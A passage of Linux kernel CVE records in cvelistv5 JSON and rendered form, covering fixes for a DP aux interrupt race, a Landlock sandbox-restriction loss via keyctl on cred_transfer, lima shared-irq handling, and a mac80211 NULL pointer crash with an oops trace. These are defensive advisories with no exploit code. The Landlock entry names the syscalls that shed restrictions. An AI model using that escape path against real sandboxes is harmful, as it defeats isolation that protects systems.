"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48872",
"datePublished": "2024-08-21T06:10:02.954Z",
"dateReserved": "2024-07-16T11:38:08.921Z",
"dateUpdated": "2025-05-04T08:25:13.379Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48898 (GCVE-0-2022-48898)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/msm/dp: do not complete dp_aux_cmd_fifo_tx() if irq is not for aux transfer
There are 3 possible interrupt sources are handled by DP controller,
HPDstatus, Controller state changes and Aux read/write transaction.
At every irq, DP controller have to check isr status of every interrupt
sources and service the interrupt if its isr status bits shows interrupts
are pending. There is potential race condition may happen at current aux
isr handler implementation since it is always complete dp_aux_cmd_fifo_tx()
even irq is not for aux read or write transaction. This may cause aux read
transaction return premature if host aux data read is in the middle of
waiting for sink to complete transferring data to host while irq happen.
This will cause host's receiving buffer contains unexpected data. This
patch fixes this problem by checking aux isr and return immediately at
aux isr handler if there are no any isr status bits set.
Current there is a bug report regrading eDP edid corruption happen during
system booting up. After lengthy debugging to found that VIDEO_READY
interrupt was continuously firing during system booting up which cause
dp_aux_isr() to complete dp_aux_cmd_fifo_tx() prematurely to retrieve data
from aux hardware buffer which is not yet contains complete data transfer
from sink. This cause edid corruption.
Follows are the signature at kernel logs when problem happen,
EDID has corrupt header
panel-simple-dp-aux aux-aea0000.edp: Couldn't identify panel via EDID
Changes in v2:
-- do complete if (ret == IRQ_HANDLED) ay dp-aux_isr()
-- add more commit text
Changes in v3:
-- add Stephen suggested
-- dp_aux_isr() return IRQ_XXX back to caller
-- dp_ctrl_isr() return IRQ_XXX back to caller
Changes in v4:
-- split into two patches
Changes in v5:
-- delete empty line between tags
Changes in v6:
-- remove extra "that" and fixed line more than 75 char at commit text
Patchwork: https://patchwork.freedesktop.org/patch/516121/
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48898",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:03:59.433408Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:16.252Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/msm/dp/dp_aux.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "785607e5e6fb52caf141e4580de40405565f04f1",
"status": "affected",
"version": "c943b4948b5848fc0e07f875edbd35a973879e22",
"versionType": "git"
},
{
"lessThan": "984ad875db804948c86ca9e1c2e784ae8252715a",
"status": "affected",
"version": "c943b4948b5848fc0e07f875edbd35a973879e22",
"versionType": "git"
},
{
"lessThan": "b7dcbca46db3c77fdb02c2a9d6239e5aa3b06a59",
"status": "affected",
"version": "c943b4948b5848fc0e07f875edbd35a973879e22",
"versionType": "git"
},
{
"lessThan": "1cba0d150fa102439114a91b3e215909efc9f169",
"status": "affected",
"version": "c943b4948b5848fc0e07f875edbd35a973879e22",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/msm/dp/dp_aux.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.10"
},
{
"lessThan": "5.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.164",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.89",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.164",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.89",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/dp: do not complete dp_aux_cmd_fifo_tx() if irq is not for aux transfer\n\nThere are 3 possible interrupt sources are handled by DP controller,\nHPDstatus, Controller state changes and Aux read/write transaction.\nAt every irq, DP controller have to check isr status of every interrupt\nsources and service the interrupt if its isr status bits shows interrupts\nare pending. There is potential race condition may happen at current aux\nisr handler implementation since it is always complete dp_aux_cmd_fifo_tx()\neven irq is not for aux read or write transaction. This may cause aux read\ntransaction return premature if host aux data read is in the middle of\nwaiting for sink to complete transferring data to host while irq happen.\nThis will cause host\u0027s receiving buffer contains unexpected data. This\npatch fixes this problem by checking aux isr and return immediately at\naux isr handler if there are no any isr status bits set.\n\nCurrent there is a bug report regrading eDP edid corruption happen during\nsystem booting up. After lengthy debugging to found that VIDEO_READY\ninterrupt was continuously firing during system booting up which cause\ndp_aux_isr() to complete dp_aux_cmd_fifo_tx() prematurely to retrieve data\nfrom aux hardware buffer which is not yet contains complete data transfer\nfrom sink. This cause edid corruption.\n\nFollows are the signature at kernel logs when problem happen,\nEDID has corrupt header\npanel-simple-dp-aux aux-aea0000.edp: Couldn\u0027t identify panel via EDID\n\nChanges in v2:\n-- do complete if (ret == IRQ_HANDLED) ay dp-aux_isr()\n-- add more commit text\n\nChanges in v3:\n-- add Stephen suggested\n-- dp_aux_isr() return IRQ_XXX back to caller\n-- dp_ctrl_isr() return IRQ_XXX back to caller\n\nChanges in v4:\n-- split into two patches\n\nChanges in v5:\n-- delete empty line between tags\n\nChanges in v6:\n-- remove extra \"that\" and fixed line more than 75 char at commit text\n\nPatchwork: https://patchwork.freedesktop.org/patch/516121/"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:43.598Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/785607e5e6fb52caf141e4580de40405565f04f1"
},
{
"url": "https://git.kernel.org/stable/c/984ad875db804948c86ca9e1c2e784ae8252715a"
},
{
"url": "https://git.kernel.org/stable/c/b7dcbca46db3c77fdb02c2a9d6239e5aa3b06a59"
},
{
"url": "https://git.kernel.org/stable/c/1cba0d150fa102439114a91b3e215909efc9f169"
}
],
"title": "drm/msm/dp: do not complete dp_aux_cmd_fifo_tx() if irq is not for aux transfer",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48898",
"datePublished": "2024-08-21T06:10:30.879Z",
"dateReserved": "2024-08-21T06:06:23.291Z",
"dateUpdated": "2025-05-04T08:25:43.598Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42318 (GCVE-0-2024-42318)
Vulnerability from cvelistv5
Published
2024-08-17 09:09
Modified
2025-05-04 09:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
landlock: Don't lose track of restrictions on cred_transfer
When a process' cred struct is replaced, this _almost_ always invokes
the cred_prepare LSM hook; but in one special case (when
KEYCTL_SESSION_TO_PARENT updates the parent's credentials), the
cred_transfer LSM hook is used instead. Landlock only implements the
cred_prepare hook, not cred_transfer, so KEYCTL_SESSION_TO_PARENT causes
all information on Landlock restrictions to be lost.
This basically means that a process with the ability to use the fork()
and keyctl() syscalls can get rid of all Landlock restrictions on
itself.
Fix it by adding a cred_transfer hook that does the same thing as the
existing cred_prepare hook. (Implemented by having hook_cred_prepare()
call hook_cred_transfer() so that the two functions are less likely to
accidentally diverge in the future.)
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-17T19:02:26.874Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2024/08/17/2"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42318",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:09:35.795087Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:26.227Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"security/landlock/cred.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "916c648323fa53b89eedb34a0988ddaf01406117",
"status": "affected",
"version": "385975dca53eb41031d0cbd1de318eb1bc5d6bb9",
"versionType": "git"
},
{
"lessThan": "0d74fd54db0bd0c0c224bef0da8fc95ea9c9f36c",
"status": "affected",
"version": "385975dca53eb41031d0cbd1de318eb1bc5d6bb9",
"versionType": "git"
},
{
"lessThan": "16896914bace82d7811c62f3b6d5320132384f49",
"status": "affected",
"version": "385975dca53eb41031d0cbd1de318eb1bc5d6bb9",
"versionType": "git"
},
{
"lessThan": "b14cc2cf313bd29056fadbc8ecd7f957cf5791ff",
"status": "affected",
"version": "385975dca53eb41031d0cbd1de318eb1bc5d6bb9",
"versionType": "git"
},
{
"lessThan": "39705a6c29f8a2b93cf5b99528a55366c50014d1",
"status": "affected",
"version": "385975dca53eb41031d0cbd1de318eb1bc5d6bb9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"security/landlock/cred.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.13"
},
{
"lessThan": "5.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nlandlock: Don\u0027t lose track of restrictions on cred_transfer\n\nWhen a process\u0027 cred struct is replaced, this _almost_ always invokes\nthe cred_prepare LSM hook; but in one special case (when\nKEYCTL_SESSION_TO_PARENT updates the parent\u0027s credentials), the\ncred_transfer LSM hook is used instead. Landlock only implements the\ncred_prepare hook, not cred_transfer, so KEYCTL_SESSION_TO_PARENT causes\nall information on Landlock restrictions to be lost.\n\nThis basically means that a process with the ability to use the fork()\nand keyctl() syscalls can get rid of all Landlock restrictions on\nitself.\n\nFix it by adding a cred_transfer hook that does the same thing as the\nexisting cred_prepare hook. (Implemented by having hook_cred_prepare()\ncall hook_cred_transfer() so that the two functions are less likely to\naccidentally diverge in the future.)"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:26:39.182Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/916c648323fa53b89eedb34a0988ddaf01406117"
},
{
"url": "https://git.kernel.org/stable/c/0d74fd54db0bd0c0c224bef0da8fc95ea9c9f36c"
},
{
"url": "https://git.kernel.org/stable/c/16896914bace82d7811c62f3b6d5320132384f49"
},
{
"url": "https://git.kernel.org/stable/c/b14cc2cf313bd29056fadbc8ecd7f957cf5791ff"
},
{
"url": "https://git.kernel.org/stable/c/39705a6c29f8a2b93cf5b99528a55366c50014d1"
},
{
"url": "https://lore.kernel.org/all/20240817.shahka3Ee1iy@digikod.net/"
},
{
"url": "https://www.openwall.com/lists/oss-security/2024/08/17/2"
},
{
"url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2566"
}
],
"title": "landlock: Don\u0027t lose track of restrictions on cred_transfer",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42318",
"datePublished": "2024-08-17T09:09:31.160Z",
"dateReserved": "2024-07-30T07:40:12.278Z",
"dateUpdated": "2025-05-04T09:26:39.182Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42127 (GCVE-0-2024-42127)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-07-28 11:16
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/lima: fix shared irq handling on driver remove
lima uses a shared interrupt, so the interrupt handlers must be prepared
to be called at any time. At driver removal time, the clocks are
disabled early and the interrupts stay registered until the very end of
the remove process due to the devm usage.
This is potentially a bug as the interrupts access device registers
which assumes clocks are enabled. A crash can be triggered by removing
the driver in a kernel with CONFIG_DEBUG_SHIRQ enabled.
This patch frees the interrupts at each lima device finishing callback
so that the handlers are already unregistered by the time we fully
disable clocks.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a1d2a6339961efc078208dc3b2f006e9e9a8e119 Version: a1d2a6339961efc078208dc3b2f006e9e9a8e119 Version: a1d2a6339961efc078208dc3b2f006e9e9a8e119 Version: a1d2a6339961efc078208dc3b2f006e9e9a8e119 Version: a1d2a6339961efc078208dc3b2f006e9e9a8e119 Version: a1d2a6339961efc078208dc3b2f006e9e9a8e119 Version: a1d2a6339961efc078208dc3b2f006e9e9a8e119 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.183Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0d60c43df59ef01c08dc7b0c45495178f9d05a13"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/25d0d9b83d855cbc5d5aa5ae3cd79d55ea0c84a8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/17fe8b75aaf0bb1bdc31368963446b421c22d0af"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0a487e977cb8897ae4c51ecd34bbaa2b005266c9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/04d531b9a1875846d4f89953b469ad463aa7a770"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b5daf9217a50636a969bc1965f827878aeb09ffe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a6683c690bbfd1f371510cb051e8fa49507f3f5e"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42127",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:16:38.392074Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:04.418Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/lima/lima_gp.c",
"drivers/gpu/drm/lima/lima_mmu.c",
"drivers/gpu/drm/lima/lima_pp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0d60c43df59ef01c08dc7b0c45495178f9d05a13",
"status": "affected",
"version": "a1d2a6339961efc078208dc3b2f006e9e9a8e119",
"versionType": "git"
},
{
"lessThan": "25d0d9b83d855cbc5d5aa5ae3cd79d55ea0c84a8",
"status": "affected",
"version": "a1d2a6339961efc078208dc3b2f006e9e9a8e119",
"versionType": "git"
},
{
"lessThan": "17fe8b75aaf0bb1bdc31368963446b421c22d0af",
"status": "affected",
"version": "a1d2a6339961efc078208dc3b2f006e9e9a8e119",
"versionType": "git"
},
{
"lessThan": "0a487e977cb8897ae4c51ecd34bbaa2b005266c9",
"status": "affected",
"version": "a1d2a6339961efc078208dc3b2f006e9e9a8e119",
"versionType": "git"
},
{
"lessThan": "04d531b9a1875846d4f89953b469ad463aa7a770",
"status": "affected",
"version": "a1d2a6339961efc078208dc3b2f006e9e9a8e119",
"versionType": "git"
},
{
"lessThan": "b5daf9217a50636a969bc1965f827878aeb09ffe",
"status": "affected",
"version": "a1d2a6339961efc078208dc3b2f006e9e9a8e119",
"versionType": "git"
},
{
"lessThan": "a6683c690bbfd1f371510cb051e8fa49507f3f5e",
"status": "affected",
"version": "a1d2a6339961efc078208dc3b2f006e9e9a8e119",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/lima/lima_gp.c",
"drivers/gpu/drm/lima/lima_mmu.c",
"drivers/gpu/drm/lima/lima_pp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.2"
},
{
"lessThan": "5.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.280",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.280",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/lima: fix shared irq handling on driver remove\n\nlima uses a shared interrupt, so the interrupt handlers must be prepared\nto be called at any time. At driver removal time, the clocks are\ndisabled early and the interrupts stay registered until the very end of\nthe remove process due to the devm usage.\nThis is potentially a bug as the interrupts access device registers\nwhich assumes clocks are enabled. A crash can be triggered by removing\nthe driver in a kernel with CONFIG_DEBUG_SHIRQ enabled.\nThis patch frees the interrupts at each lima device finishing callback\nso that the handlers are already unregistered by the time we fully\ndisable clocks."
}
],
"providerMetadata": {
"dateUpdated": "2025-07-28T11:16:37.126Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0d60c43df59ef01c08dc7b0c45495178f9d05a13"
},
{
"url": "https://git.kernel.org/stable/c/25d0d9b83d855cbc5d5aa5ae3cd79d55ea0c84a8"
},
{
"url": "https://git.kernel.org/stable/c/17fe8b75aaf0bb1bdc31368963446b421c22d0af"
},
{
"url": "https://git.kernel.org/stable/c/0a487e977cb8897ae4c51ecd34bbaa2b005266c9"
},
{
"url": "https://git.kernel.org/stable/c/04d531b9a1875846d4f89953b469ad463aa7a770"
},
{
"url": "https://git.kernel.org/stable/c/b5daf9217a50636a969bc1965f827878aeb09ffe"
},
{
"url": "https://git.kernel.org/stable/c/a6683c690bbfd1f371510cb051e8fa49507f3f5e"
}
],
"title": "drm/lima: fix shared irq handling on driver remove",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42127",
"datePublished": "2024-07-30T07:46:24.070Z",
"dateReserved": "2024-07-29T15:50:41.184Z",
"dateUpdated": "2025-07-28T11:16:37.126Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48875 (GCVE-0-2022-48875)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: mac80211: sdata can be NULL during AMPDU start
ieee80211_tx_ba_session_handle_start() may get NULL for sdata when a
deauthentication is ongoing.
Here a trace triggering the race with the hostapd test
multi_ap_fronthaul_on_ap:
(gdb) list *drv_ampdu_action+0x46
0x8b16 is in drv_ampdu_action (net/mac80211/driver-ops.c:396).
391 int ret = -EOPNOTSUPP;
392
393 might_sleep();
394
395 sdata = get_bss_sdata(sdata);
396 if (!check_sdata_in_driver(sdata))
397 return -EIO;
398
399 trace_drv_ampdu_action(local, sdata, params);
400
wlan0: moving STA 02:00:00:00:03:00 to state 3
wlan0: associated
wlan0: deauthenticating from 02:00:00:00:03:00 by local choice (Reason: 3=DEAUTH_LEAVING)
wlan3.sta1: Open BA session requested for 02:00:00:00:00:00 tid 0
wlan3.sta1: dropped frame to 02:00:00:00:00:00 (unauthorized port)
wlan0: moving STA 02:00:00:00:03:00 to state 2
wlan0: moving STA 02:00:00:00:03:00 to state 1
wlan0: Removed STA 02:00:00:00:03:00
wlan0: Destroyed STA 02:00:00:00:03:00
BUG: unable to handle page fault for address: fffffffffffffb48
PGD 11814067 P4D 11814067 PUD 11816067 PMD 0
Oops: 0000 [#1] PREEMPT SMP PTI
CPU: 2 PID: 133397 Comm: kworker/u16:1 Tainted: G W 6.1.0-rc8-wt+ #59
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.0-20220807_005459-localhost 04/01/2014
Workqueue: phy3 ieee80211_ba_session_work [mac80211]
RIP: 0010:drv_ampdu_action+0x46/0x280 [mac80211]
Code: 53 48 89 f3 be 89 01 00 00 e8 d6 43 bf ef e8 21 46 81 f0 83 bb a0 1b 00 00 04 75 0e 48 8b 9b 28 0d 00 00 48 81 eb 10 0e 00 00 <8b> 93 58 09 00 00 f6 c2 20 0f 84 3b 01 00 00 8b 05 dd 1c 0f 00 85
RSP: 0018:ffffc900025ebd20 EFLAGS: 00010287
RAX: 0000000000000000 RBX: fffffffffffff1f0 RCX: ffff888102228240
RDX: 0000000080000000 RSI: ffffffff918c5de0 RDI: ffff888102228b40
RBP: ffffc900025ebd40 R08: 0000000000000001 R09: 0000000000000001
R10: 0000000000000001 R11: 0000000000000000 R12: ffff888118c18ec0
R13: 0000000000000000 R14: ffffc900025ebd60 R15: ffff888018b7efb8
FS: 0000000000000000(0000) GS:ffff88817a600000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: fffffffffffffb48 CR3: 0000000105228006 CR4: 0000000000170ee0
Call Trace:
<TASK>
ieee80211_tx_ba_session_handle_start+0xd0/0x190 [mac80211]
ieee80211_ba_session_work+0xff/0x2e0 [mac80211]
process_one_work+0x29f/0x620
worker_thread+0x4d/0x3d0
? process_one_work+0x620/0x620
kthread+0xfb/0x120
? kthread_complete_and_exit+0x20/0x20
ret_from_fork+0x22/0x30
</TASK>
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48875",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:05:16.319547Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:53.565Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/mac80211/agg-tx.c",
"net/mac80211/driver-ops.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "187523fa7c2d4c780f775cb869216865c4a909ef",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a12fd43bd175fa52c82f9740179d38c34ca1b62e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c838df8461a601b20dc1b9fb1834d2aad8e2f949",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "69403bad97aa0162e3d7911b27e25abe774093df",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/mac80211/agg-tx.c",
"net/mac80211/driver-ops.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
